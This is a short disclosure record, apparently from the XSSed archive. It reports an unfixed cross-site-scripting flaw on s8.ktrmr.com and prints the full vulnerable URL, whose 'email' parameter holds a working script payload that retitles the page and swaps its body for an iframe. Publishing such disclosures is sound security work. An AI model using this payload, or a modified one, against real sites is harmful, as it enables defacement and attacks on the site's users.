Unfixed XSS vulnerability at s8.ktrmr.com

2010-07-06T00:00:00
ID XSSED:67157
Type xssed
Reporter root_op
Modified 2012-01-13T00:00:00

Description

Security researcher root_op, has submitted on 07/06/2010 a cross-site-scripting (XSS) vulnerability affecting s8.ktrmr.com, which at the time of submission ranked 7566 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/01/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://s8.ktrmr.com/projects/allprojects/auth_fail/enu.asp?S=MBD44&PROJECT=COK100T10SE&PID=3a2dce3c-88ba-4bf2-95f3-ff5ad99b1255&R=600&L=&st=1&alertme=0&err=NORSTRT&email=%3C/a%3E%3Cscript%3Edocument.title=%22XSS%20\/\/%20root_op%22;document.body.innerHTML=%22%3Ciframe%20src=\%22http://xssed.com\%22%3E%22;%3C/script%3E